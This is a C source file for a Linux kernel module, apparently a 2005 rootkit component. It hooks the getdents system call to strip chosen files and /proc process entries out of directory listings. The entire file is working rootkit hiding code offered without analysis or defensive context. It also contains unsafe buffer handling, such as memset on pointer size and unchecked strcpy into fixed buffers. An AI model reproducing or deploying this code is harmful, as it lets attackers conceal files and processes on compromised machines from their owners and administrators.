/************************************
 *                                  *
 *       *
 *  Written by _4epen, 2005         *
 *                                  *
 ************************************/

#include <linux/config.h>
#include <linux/stddef.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/proc_fs.h>
#include <linux/sched.h>
#include <linux/dirent.h>
#include <linux/fs.h>
#include <linux/unistd.h>
#include <linux/string.h>
#include <linux/dcache.h>
#include <linux/dirent.h>
#include <linux/file.h>
#include <asm/uaccess.h>
#include <linux/smp_lock.h>
#include <linux/capability.h>

#include "prototp.h"

/*                              */
extern int (*o_getdents)(unsigned int, struct dirent*, unsigned int);

/*                                        */
char* get_file_path(int, char*);
char* get_full_name(int);
int atoi(char* x);

/*         */
int h_getdents(unsigned int fd, struct dirent* dirp, unsigned int count)
{
	char* x;
	unsigned int temp, n; int t;
	struct file* file;
	struct dirent64 {
		int d_ino1,d_ino2;
		int d_off1,d_off2;
		unsigned short d_reclen;
		unsigned char d_type;
		char d_name[0];
	} *dp1, *dp2;
	struct super_block* sb;
	file = fget(fd);
	sb = file->f_dentry->d_sb;
	/*       */
	temp = o_getdents(fd, dirp, count);
	if(temp>0) {
		dp1 = (struct dirent64 *)kmalloc(temp, GFP_KERNEL);
		copy_from_user(dp1,dirp,temp); dp2 = dp1; t = temp;
		/*      */
		while(t>0) {
			n = dp2->d_reclen; t -= n;
			/*     */
			x = get_file_path(fd, (char*)&(dp2->d_name));
			if(f_lhidden(x) || f_hidden(x)) {
				memcpy(dp2, (char*)dp2+dp2->d_reclen, t);
				temp -= n;
			}
			kfree(x);
			/*      */
			if(sb->s_magic==PROC_SUPER_MAGIC && hidden(atoi((char*)&(dp2->d_name)))) {
				memcpy(dp2, (char*)dp2+dp2->d_reclen, t);
				temp -= n;
			}
			/*      */
			dp2 = (struct dirent64*)((char*)dp2+dp2->d_reclen);
		}
		/*       */
		copy_to_user(dirp, dp1, temp);
		kfree(dp1);
	}
	return temp;
}

int atoi(char* x) {
	int i, res, k;
	k = 1; res = 0;
	for(i=strlen(x)-1;i>=0;i--) {
		res += k*(x[i]-'0');
		k   *= 10;
	}
	return res;
}

char* get_full_name(int fd) {
	char *x, *y;
	struct file* file;
	struct dentry* dentry;
	x = (char*)kmalloc(10000, GFP_KERNEL);
	y = (char*)kmalloc(10000, GFP_KERNEL);
	file = fget(fd);
	memset(x, 0, sizeof(x));
	memset(y, 0, sizeof(y));
	for(dentry=file->f_dentry;strcmp(dentry->d_iname, "/")!=0;dentry=dentry->d_parent) {
		strcpy(y, dentry->d_iname);
		strcat(y, "/");
		strcat(y, x);
		strcpy(x, y);
		memset(y, 0, sizeof(y));
	}
	strcpy(y, "/");
	strcat(y, x);
	strcpy(x, y);
	strcat(x, "\0");
	kfree(y);
	return x;
}

char* get_file_path(int fd, char* file) {
	char *x, *y;
	x = (char*)kmalloc(10000, GFP_KERNEL);
	memset(x, 0, sizeof(x));
	y = get_full_name(fd);
	strcpy(x, y);
	kfree(y);
	strcat(x, file);
	return x;
}
